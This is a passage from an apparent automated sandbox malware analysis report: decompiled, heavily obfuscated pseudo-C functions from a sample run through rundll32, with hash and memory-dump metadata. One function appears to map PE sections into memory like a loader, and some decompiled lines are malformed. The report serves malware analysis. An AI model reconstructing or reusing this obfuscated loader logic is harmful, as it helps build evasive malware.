                                                                                                                          				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x35842ad7;
                                                                                                                          				 *(_t245 + 0x28) = 0x69c662;
                                                                                                                          				 *(_t245 + 0x28) =  *(_t245 + 0x28) * 0x1f;
                                                                                                                          				 *(_t245 + 0x28) =  *(_t245 + 0x28) ^ 0x0ccd1c29;
                                                                                                                          				 *(_t245 + 0x20) = 0x70b48b;
                                                                                                                          				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xdd83dbf0;
                                                                                                                          				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xddf73f48;
                                                                                                                          				 *(_t245 + 0x1c) = 0x80403c;
                                                                                                                          				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) * 0x1c;
                                                                                                                          				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) ^ 0x0e0dbad6;
                                                                                                                          				_push( *(_t245 + 0x58));
                                                                                                                          				_push( *(_t245 + 0x40));
                                                                                                                          				_t236 = 0x1e;
                                                                                                                          				E00794B61(_t142, _t236);
                                                                                                                          				_t166 = _t245 - 0x220; // 0x12da7b13
                                                                                                                          				E00794B61(_t166, 0x208,  *(_t245 + 0x24),  *(_t245 + 0x34));
                                                                                                                          				_t169 = _t245 - 0x428; // 0x12da790b
                                                                                                                          				E00794B61(_t169, 0x208,  *(_t245 + 0x2c),  *(_t245 + 0x60));
                                                                                                                          				_t171 = _t245 - 0x220; // 0x12da7b13
                                                                                                                          				E00793BC0( *(_t245 + 0x44),  *(_t245 + 0x50), __edx,  *(_t245 + 0x18),  *(_t245 + 0x3c), _t171);
                                                                                                                          				_t176 = _t245 - 0x428; // 0x12da790b
                                                                                                                          				E00793BC0( *(_t245 + 0x48),  *(_t245 + 0x5c),  *((intOrPtr*)(_t245 + 0x78)),  *(_t245 + 0x64),  *(_t245 + 0x68), _t176);
                                                                                                                          				_t183 = _t245 - 0x18; // 0x12da7d1b
                                                                                                                          				 *(_t245 - 0x14) =  *(_t245 + 0x38);
                                                                                                                          				_t185 = _t245 - 0x220; // 0x12da7b13
                                                                                                                          				 *((intOrPtr*)(_t245 - 0x10)) = _t185;
                                                                                                                          				_t187 = _t245 - 0x428; // 0x12da790b
                                                                                                                          				 *((intOrPtr*)(_t245 - 0xc)) = _t187;
                                                                                                                          				 *((short*)(_t245 - 8)) =  *(_t245 + 0x54) |  *(_t245 + 0x4c) | 0x00000410;
                                                                                                                          				_t222 = E00794DDD( *(_t245 + 0x30), _t183,  *(_t245 + 0x28),  *(_t245 + 0x20),  *(_t245 + 0x1c));
                                                                                                                          				asm("sbb eax, eax");
                                                                                                                          				return  ~_t222 + 1;
                                                                                                                          			}










                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: !h$5M$d,
                                                                                                                          • API String ID: 0-3324333736
                                                                                                                          • Opcode ID: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                          • Instruction ID: 6cea0ba61b7576c9411ad72cd5b7e731f54760e702a2d3d6256e6380863765ae
                                                                                                                          • Opcode Fuzzy Hash: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                          • Instruction Fuzzy Hash: FD91BCB141038C9BCF58CF65D98A9DE3FB1BB04358F509219FE2A96260D3B58999CF84
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E007ADEDC(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                                                                                          				char _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				void* _t132;
                                                                                                                          				signed int _t152;
                                                                                                                          				signed int _t154;
                                                                                                                          				signed int _t155;
                                                                                                                          				void* _t158;
                                                                                                                          				signed int* _t175;
                                                                                                                          				void* _t177;
                                                                                                                          				void* _t178;
                                                                                                                          
                                                                                                                          				_push(_a16);
                                                                                                                          				_t174 = _a12;
                                                                                                                          				_t175 = __ecx;
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t132);
                                                                                                                          				_v68 = 0x4bd93;
                                                                                                                          				_t178 = _t177 + 0x18;
                                                                                                                          				_v68 = _v68 << 0xc;
                                                                                                                          				_v68 = _v68 ^ 0x4bd93000;
                                                                                                                          				_t158 = 0xc7349d4;
                                                                                                                          				_v72 = 0xdd086a;
                                                                                                                          				_v72 = _v72 + 0xe602;
                                                                                                                          				_v72 = _v72 ^ 0x00de9932;
                                                                                                                          				_v80 = 0x3b4fac;
                                                                                                                          				_v80 = _v80 | 0x3fbbffff;
                                                                                                                          				_v80 = _v80 ^ 0x3fb1db7a;
                                                                                                                          				_v84 = 0xeaa49b;
                                                                                                                          				_v84 = _v84 | 0xeaf55708;
                                                                                                                          				_v84 = _v84 ^ 0x8a8b7318;
                                                                                                                          				_v84 = _v84 ^ 0x607b886d;
                                                                                                                          				_v88 = 0x47a;
                                                                                                                          				_v88 = _v88 << 0x10;
                                                                                                                          				_v88 = _v88 << 7;
                                                                                                                          				_v88 = _v88 ^ 0x3d0d9eb4;
                                                                                                                          				_v92 = 0xf1af5e;
                                                                                                                          				_v92 = _v92 >> 0xc;
                                                                                                                          				_t154 = 0x35;
                                                                                                                          				_v92 = _v92 * 0x55;
                                                                                                                          				_v92 = _v92 ^ 0x000492d7;
                                                                                                                          				_v104 = 0x9f0b47;
                                                                                                                          				_v104 = _v104 + 0xffffc934;
                                                                                                                          				_v104 = _v104 ^ 0x723421f7;
                                                                                                                          				_v104 = _v104 | 0x7192d654;
                                                                                                                          				_v104 = _v104 ^ 0x73b08a7e;
                                                                                                                          				_v100 = 0x1207d9;
                                                                                                                          				_v100 = _v100 + 0x7e1b;
                                                                                                                          				_v100 = _v100 | 0x7b677906;
                                                                                                                          				_v100 = _v100 * 0xf;
                                                                                                                          				_v100 = _v100 ^ 0x3c0b4b50;
                                                                                                                          				_v60 = 0x5b441e;
                                                                                                                          				_v60 = _v60 ^ 0x5c22d9cd;
                                                                                                                          				_v60 = _v60 ^ 0x5c7ef938;
                                                                                                                          				_v64 = 0xefe367;
                                                                                                                          				_v64 = _v64 + 0x4581;
                                                                                                                          				_v64 = _v64 ^ 0x00f6697a;
                                                                                                                          				_v76 = 0x71c375;
                                                                                                                          				_t155 = 0x14;
                                                                                                                          				_v76 = _v76 / _t154;
                                                                                                                          				_v76 = _v76 + 0xaf56;
                                                                                                                          				_v76 = _v76 ^ 0x000ba048;
                                                                                                                          				_v48 = 0x1a9f92;
                                                                                                                          				_v48 = _v48 + 0x9d50;
                                                                                                                          				_v48 = _v48 ^ 0x001d37d0;
                                                                                                                          				_v52 = 0xf5c688;
                                                                                                                          				_v52 = _v52 + 0xffff5f34;
                                                                                                                          				_v52 = _v52 ^ 0x00ffa10c;
                                                                                                                          				_v56 = 0x3cec64;
                                                                                                                          				_v56 = _v56 ^ 0x003949c0;
                                                                                                                          				_v96 = 0x7057ec;
                                                                                                                          				_v96 = _v96 * 0x35;
                                                                                                                          				_v96 = _v96 | 0xca3e56e5;
                                                                                                                          				_v96 = _v96 / _t155;
                                                                                                                          				_v96 = _v96 ^ 0x0b2d80e0;
                                                                                                                          				do {
                                                                                                                          					while(_t158 != 0x254c3a7) {
                                                                                                                          						if(_t158 == 0x324cad4) {
                                                                                                                          							E007A0DAF(_v100,  &_v44, _v60,  *_t174, _v64, _v76);
                                                                                                                          							_t178 = _t178 + 0x10;
                                                                                                                          							_t158 = 0xd972b83;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t158 == 0xc7349d4) {
                                                                                                                          								_t158 = 0x254c3a7;
                                                                                                                          								 *_t175 =  *_t175 & 0x00000000;
                                                                                                                          								_t175[1] = _v68;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								if(_t158 == 0xd972b83) {
                                                                                                                          									E007B0E3A( &_v44, _v48, __eflags, _v52, _v56, _v96, _t174 + 4);
                                                                                                                          								} else {
                                                                                                                          									if(_t158 == 0xecd5bc1) {
                                                                                                                          										_push(_t158);
                                                                                                                          										_push(_t158);
                                                                                                                          										_t152 = E00797FF2(_t175[1]);
                                                                                                                          										 *_t175 = _t152;
                                                                                                                          										__eflags = _t152;
                                                                                                                          										if(__eflags != 0) {
                                                                                                                          											_t158 = 0xfbc7198;
                                                                                                                          											continue;
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										if(_t158 != 0xfbc7198) {
                                                                                                                          											goto L13;
                                                                                                                          										} else {
                                                                                                                          											E00793DBC( &_v44, _t175, _v88, _v92, _v104);
                                                                                                                          											_t178 = _t178 + 0xc;
                                                                                                                          											_t158 = 0x324cad4;
                                                                                                                          											continue;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L16:
                                                                                                                          						__eflags =  *_t175;
                                                                                                                          						_t131 =  *_t175 != 0;
                                                                                                                          						__eflags = _t131;
                                                                                                                          						return 0 | _t131;
                                                                                                                          					}
                                                                                                                          					_t175[1] = E007AAC3A(_t174);
                                                                                                                          					_t158 = 0xecd5bc1;
                                                                                                                          					L13:
                                                                                                                          					__eflags = _t158 - 0x72dd7bf;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				goto L16;
                                                                                                                          			}

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: d<$g$Wp
                                                                                                                          • API String ID: 0-355099142
                                                                                                                          • Opcode ID: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                          • Instruction ID: c50d4b322ccda987b8e261a65c923a9912b9c8fa0ddd9869bea21f391742c73c
                                                                                                                          • Opcode Fuzzy Hash: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                          • Instruction Fuzzy Hash: 7C7132B11093419FD768CF61C48942BBBF1FBC9748F508A1DF29A96220D37A9A49CF47
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E007AC3A0(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                          				signed int _v4;
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				void* _t137;
                                                                                                                          				void* _t149;
                                                                                                                          				void* _t159;
                                                                                                                          				void* _t161;
                                                                                                                          				signed int _t163;
                                                                                                                          				signed int _t164;
                                                                                                                          				signed int _t165;
                                                                                                                          				signed int _t166;
                                                                                                                          				signed int _t167;
                                                                                                                          				void* _t188;
                                                                                                                          				void* _t193;
                                                                                                                          				intOrPtr* _t195;
                                                                                                                          				signed int* _t197;
                                                                                                                          				signed int* _t198;
                                                                                                                          				signed int* _t199;
                                                                                                                          
                                                                                                                          				_push(_a16);
                                                                                                                          				_t195 = __ecx;
                                                                                                                          				_push(0);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t137);
                                                                                                                          				_v4 = _v4 & 0x00000000;
                                                                                                                          				_v12 = 0x8437e8;
                                                                                                                          				_v8 = 0xdb9720;
                                                                                                                          				_v60 = 0xf5e956;
                                                                                                                          				_v60 = _v60 << 0xc;
                                                                                                                          				_t163 = 0x6b;
                                                                                                                          				_v60 = _v60 / _t163;
                                                                                                                          				_v60 = _v60 | 0x488cc8ef;
                                                                                                                          				_v60 = _v60 ^ 0x48eedbff;
                                                                                                                          				_v44 = 0x82c5a5;
                                                                                                                          				_v44 = _v44 | 0x04b6a6f1;
                                                                                                                          				_t164 = 0x4a;
                                                                                                                          				_v44 = _v44 * 0x6a;
                                                                                                                          				_v44 = _v44 ^ 0xf3bc2b72;
                                                                                                                          				_v40 = 0x882fad;
                                                                                                                          				_v40 = _v40 ^ 0x709d76bd;
                                                                                                                          				_v40 = _v40 + 0xffff52d2;
                                                                                                                          				_v40 = _v40 ^ 0x7014aba2;
                                                                                                                          				_v28 = 0x22e756;
                                                                                                                          				_v28 = _v28 + 0x769a;
                                                                                                                          				_v28 = _v28 ^ 0x002bcc4a;
                                                                                                                          				_v64 = 0xc290d0;
                                                                                                                          				_v64 = _v64 + 0xffff641a;
                                                                                                                          				_v64 = _v64 << 0xd;
                                                                                                                          				_v64 = _v64 ^ 0xbd78a131;
                                                                                                                          				_v64 = _v64 ^ 0x83ed8c94;
                                                                                                                          				_v32 = 0x78b1b0;
                                                                                                                          				_v32 = _v32 << 0xe;
                                                                                                                          				_v32 = _v32 ^ 0x2c621b2d;
                                                                                                                          				_v36 = 0xa1b61f;
                                                                                                                          				_v36 = _v36 + 0xb017;
                                                                                                                          				_v36 = _v36 | 0xc1836c3e;
                                                                                                                          				_v36 = _v36 ^ 0xc1a0ee75;
                                                                                                                          				_v56 = 0x2861cb;
                                                                                                                          				_v56 = _v56 / _t164;
                                                                                                                          				_v56 = _v56 << 0xd;
                                                                                                                          				_t165 = 0x1b;
                                                                                                                          				_v56 = _v56 / _t165;
                                                                                                                          				_v56 = _v56 ^ 0x00aa9f16;
                                                                                                                          				_v24 = 0x4a8582;
                                                                                                                          				_v24 = _v24 | 0x39704e96;
                                                                                                                          				_v24 = _v24 ^ 0x397cf0ca;
                                                                                                                          				_v52 = 0x9fdf3f;
                                                                                                                          				_v52 = _v52 | 0x733ecb9c;
                                                                                                                          				_v52 = _v52 >> 0x10;
                                                                                                                          				_t166 = 0x2c;
                                                                                                                          				_v52 = _v52 / _t166;
                                                                                                                          				_v52 = _v52 ^ 0x0002453b;
                                                                                                                          				_v20 = 0x70cd9;
                                                                                                                          				_v20 = _v20 ^ 0x0384d77a;
                                                                                                                          				_v20 = _v20 ^ 0x03811849;
                                                                                                                          				_v16 = 0x6ca56e;
                                                                                                                          				_v16 = _v16 * 0x1c;
                                                                                                                          				_v16 = _v16 ^ 0x0be055d0;
                                                                                                                          				_v48 = 0x383b50;
                                                                                                                          				_v48 = _v48 + 0xe78c;
                                                                                                                          				_v48 = _v48 + 0x7960;
                                                                                                                          				_v48 = _v48 + 0xffff251b;
                                                                                                                          				_v48 = _v48 ^ 0x003eca00;
                                                                                                                          				_t167 = _v28;
                                                                                                                          				_t149 = E0079474F(_t167, __ecx, _v64, _v32);
                                                                                                                          				_t159 = _t149;
                                                                                                                          				_t197 =  &(( &_v64)[8]);
                                                                                                                          				if(_t159 != 0) {
                                                                                                                          					_push(_t167);
                                                                                                                          					_t188 = E0079A3A3( *((intOrPtr*)(_t159 + 0x50)), _v36, _v56, _v24, _v40, _v44 | _v60);
                                                                                                                          					_t198 =  &(_t197[5]);
                                                                                                                          					if(_t188 == 0) {
                                                                                                                          						L6:
                                                                                                                          						return _t188;
                                                                                                                          					}
                                                                                                                          					E0079ED7E(_v52, _t188, _v20,  *__ecx,  *((intOrPtr*)(_t159 + 0x54)));
                                                                                                                          					_t199 =  &(_t198[3]);
                                                                                                                          					_t193 = ( *(_t159 + 0x14) & 0x0000ffff) + 0x18 + _t159;
                                                                                                                          					_t161 = ( *(_t159 + 6) & 0x0000ffff) * 0x28 + _t193;
                                                                                                                          					while(_t193 < _t161) {
                                                                                                                          						_t157 =  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10));
                                                                                                                          						E0079ED7E(_v16,  *((intOrPtr*)(_t193 + 0xc)) + _t188, _v48,  *((intOrPtr*)(_t193 + 0x14)) +  *_t195,  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10)));
                                                                                                                          						_t199 =  &(_t199[3]);
                                                                                                                          						_t193 = _t193 + 0x28;
                                                                                                                          					}
                                                                                                                          					goto L6;
                                                                                                                          				}
                                                                                                                          				return _t149;
                                                                                                                          			}

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: P;8$V"$`y
                                                                                                                          • API String ID: 0-4109183828
                                                                                                                          • Opcode ID: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                          • Instruction ID: aab895f362780554ced0cd1d97dc73bcf7c900437248c8a0b5bb22e55c5c426b
                                                                                                                          • Opcode Fuzzy Hash: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                          • Instruction Fuzzy Hash: 6C6145B1518340AFC354CF66C88991BBBF1FBC9718F108A1CF69A96260D7B6D919CF06
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E00791A56(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                          				char _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				void* _t86;
                                                                                                                          				void* _t100;
                                                                                                                          				void* _t101;
                                                                                                                          				void* _t103;
                                                                                                                          				void* _t115;
                                                                                                                          				void* _t116;
                                                                                                                          				signed int _t117;
                                                                                                                          				void* _t119;
                                                                                                                          				void* _t120;
                                                                                                                          
                                                                                                                          				_push(_a8);
                                                                                                                          				_t115 = __edx;
                                                                                                                          				_t101 = __ecx;
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t86);
                                                                                                                          				_v72 = 0xccde8a;
                                                                                                                          				_t120 = _t119 + 0x10;
                                                                                                                          				_v72 = _v72 | 0xfb673ead;
                                                                                                                          				_v72 = _v72 + 0xedb6;
                                                                                                                          				_t116 = 0;
                                                                                                                          				_v72 = _v72 + 0xffff76c0;
                                                                                                                          				_t103 = 0x3303944;
                                                                                                                          				_v72 = _v72 ^ 0xfbf43e98;
                                                                                                                          				_v48 = 0xd56f6c;
                                                                                                                          				_v48 = _v48 ^ 0x96c3cc23;
                                                                                                                          				_v48 = _v48 ^ 0x96174539;
                                                                                                                          				_v76 = 0xdcf6fd;
                                                                                                                          				_v76 = _v76 + 0xffffee01;
                                                                                                                          				_t117 = 0x65;
                                                                                                                          				_v76 = _v76 * 0x23;
                                                                                                                          				_v76 = _v76 + 0xffff4e11;
                                                                                                                          				_v76 = _v76 ^ 0x1e3c7761;
                                                                                                                          				_v80 = 0x144f78;
                                                                                                                          				_v80 = _v80 * 0x39;
                                                                                                                          				_v80 = _v80 ^ 0xe273dc44;
                                                                                                                          				_v80 = _v80 >> 5;
                                                                                                                          				_v80 = _v80 ^ 0x073b5be1;
                                                                                                                          				_v52 = 0xb4a3bb;
                                                                                                                          				_v52 = _v52 ^ 0x916b14c7;
                                                                                                                          				_v52 = _v52 ^ 0x91dd676b;
                                                                                                                          				_v68 = 0x8d73f0;
                                                                                                                          				_v68 = _v68 >> 0xe;
                                                                                                                          				_v68 = _v68 * 0x1c;
                                                                                                                          				_v68 = _v68 ^ 0x0000c864;
                                                                                                                          				_v56 = 0xe6cb06;
                                                                                                                          				_v56 = _v56 >> 4;
                                                                                                                          				_v56 = _v56 | 0x1af2f565;
                                                                                                                          				_v56 = _v56 ^ 0x1af384df;
                                                                                                                          				_v60 = 0x4f2325;
                                                                                                                          				_t55 =  &_v60; // 0x4f2325
                                                                                                                          				_v60 =  *_t55 * 0x78;
                                                                                                                          				_t57 =  &_v60; // 0x4f2325
                                                                                                                          				_v60 =  *_t57 / _t117;
                                                                                                                          				_v60 = _v60 ^ 0x0059a097;
                                                                                                                          				_v64 = 0xa290a2;
                                                                                                                          				_v64 = _v64 >> 4;
                                                                                                                          				_v64 = _v64 + 0x6f89;
                                                                                                                          				_v64 = _v64 ^ 0x00044b6b;
                                                                                                                          				while(_t103 != 0x3303944) {
                                                                                                                          					if(_t103 == 0x5a97fa2) {
                                                                                                                          						__eflags = E007AD97D( &_v44, _v56, __eflags, _v60, _t115 + 0x30, _v64);
                                                                                                                          						_t116 =  !=  ? 1 : _t116;
                                                                                                                          					} else {
                                                                                                                          						if(_t103 == 0xa5a4144) {
                                                                                                                          							E00793DBC( &_v44, _t101, _v72, _v48, _v76);
                                                                                                                          							_t120 = _t120 + 0xc;
                                                                                                                          							_t103 = 0xf0cd209;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t103 != 0xf0cd209) {
                                                                                                                          								L9:
                                                                                                                          								__eflags = _t103 - 0x1b06c67;
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								_t100 = E00792A21(_v80, _v52,  &_v44, _t115 + 0x38, _v68);
                                                                                                                          								_t120 = _t120 + 0xc;
                                                                                                                          								if(_t100 != 0) {
                                                                                                                          									_t103 = 0x5a97fa2;
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					return _t116;
                                                                                                                          				}
                                                                                                                          				_t103 = 0xa5a4144;
                                                                                                                          				goto L9;
                                                                                                                          			}























                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %#O$DAZ$DAZ
                                                                                                                          • API String ID: 0-2081751441
                                                                                                                          • Opcode ID: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                          • Instruction ID: caa7d384ce13e4dd9b00faa46e8fe79919a69abd5156b7ddea6173e2910c44a3
                                                                                                                          • Opcode Fuzzy Hash: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                          • Instruction Fuzzy Hash: 305147725083029FCB59CF25D98981FBBE1FBD8758F900A1DF586A2220D375CA198F97
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E007B0C14(void* __ecx) {
                                                                                                                          				signed int _v4;
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				void* _t111;
                                                                                                                          				void* _t115;
                                                                                                                          				void* _t116;
                                                                                                                          				signed int _t118;
                                                                                                                          				void* _t124;
                                                                                                                          				void* _t125;
                                                                                                                          				signed int* _t127;
                                                                                                                          
                                                                                                                          				_t127 =  &_v44;
                                                                                                                          				_t116 = __ecx;
                                                                                                                          				_v24 = 0x2b1199;
                                                                                                                          				_v24 = _v24 + 0x4ba2;
                                                                                                                          				_v24 = _v24 << 0xa;
                                                                                                                          				_v24 = _v24 ^ 0xad737bf1;
                                                                                                                          				_v44 = 0xc9a4fe;
                                                                                                                          				_v44 = _v44 << 0xe;
                                                                                                                          				_v44 = _v44 | 0xe69540e1;
                                                                                                                          				_v44 = _v44 + 0xffffff88;
                                                                                                                          				_v44 = _v44 ^ 0xefbb2da7;
                                                                                                                          				_v28 = 0xedc73;
                                                                                                                          				_v28 = _v28 + 0xffff2701;
                                                                                                                          				_v28 = _v28 + 0x8bbf;
                                                                                                                          				_v28 = _v28 ^ 0x00055e2c;
                                                                                                                          				_v16 = 0xf95115;
                                                                                                                          				_v16 = _v16 | 0x79ce56df;
                                                                                                                          				_v16 = _v16 + 0xffff5817;
                                                                                                                          				_v16 = _v16 ^ 0x79f40a5c;
                                                                                                                          				_v36 = 0x520750;
                                                                                                                          				_v36 = _v36 << 7;
                                                                                                                          				_v36 = _v36 ^ 0x4f263ebd;
                                                                                                                          				_v36 = _v36 * 6;
                                                                                                                          				_v36 = _v36 ^ 0x64ef8369;
                                                                                                                          				_t124 = 0;
                                                                                                                          				_v40 = 0xccfebc;
                                                                                                                          				_t125 = 0x2aa38ff;
                                                                                                                          				_v40 = _v40 + 0xbaf7;
                                                                                                                          				_t118 = 0xd;
                                                                                                                          				_v40 = _v40 * 0x5e;
                                                                                                                          				_v40 = _v40 + 0x6a66;
                                                                                                                          				_v40 = _v40 ^ 0x4b80704d;
                                                                                                                          				_v20 = 0xba2b89;
                                                                                                                          				_v20 = _v20 + 0xa093;
                                                                                                                          				_v20 = _v20 / _t118;
                                                                                                                          				_v20 = _v20 ^ 0x000a03fd;
                                                                                                                          				_v32 = 0xb0f3b0;
                                                                                                                          				_v32 = _v32 + 0x50dc;
                                                                                                                          				_v32 = _v32 + 0xffff1629;
                                                                                                                          				_v32 = _v32 * 0x4e;
                                                                                                                          				_v32 = _v32 ^ 0x35b73aee;
                                                                                                                          				_v4 = 0x432383;
                                                                                                                          				_v4 = _v4 + 0xffff373f;
                                                                                                                          				_v4 = _v4 | 0x7532efd9;
                                                                                                                          				_v4 = _v4 ^ 0x75785e39;
                                                                                                                          				_v8 = 0x709bec;
                                                                                                                          				_v8 = _v8 + 0xffffb2bc;
                                                                                                                          				_v8 = _v8 + 0xffff08e7;
                                                                                                                          				_v8 = _v8 ^ 0x006dec69;
                                                                                                                          				_v12 = 0xe79dac;
                                                                                                                          				_v12 = _v12 * 0x78;
                                                                                                                          				_v12 = _v12 + 0xb337;
                                                                                                                          				_v12 = _v12 ^ 0x6c9daebe;
                                                                                                                          				do {
                                                                                                                          					while(_t125 != 0x2aa38ff) {
                                                                                                                          						if(_t125 == 0x81ec960) {
                                                                                                                          							_t124 = _t124 + E007AC2F8(_v32, _t116 + 0x38, _v4, _v8, _v12);
                                                                                                                          						} else {
                                                                                                                          							if(_t125 == 0xa7224d4) {
                                                                                                                          								_t118 = _v16;
                                                                                                                          								_t111 = E007AC2F8(_t118, _t116 + 0x14, _v36, _v40, _v20);
                                                                                                                          								_t127 =  &(_t127[3]);
                                                                                                                          								_t125 = 0x81ec960;
                                                                                                                          								_t124 = _t124 + _t111;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								if(_t125 != 0xcb4deb0) {
                                                                                                                          									goto L8;
                                                                                                                          								} else {
                                                                                                                          									_push(_t118);
                                                                                                                          									_push(_t118);
                                                                                                                          									_t115 = E0079474B();
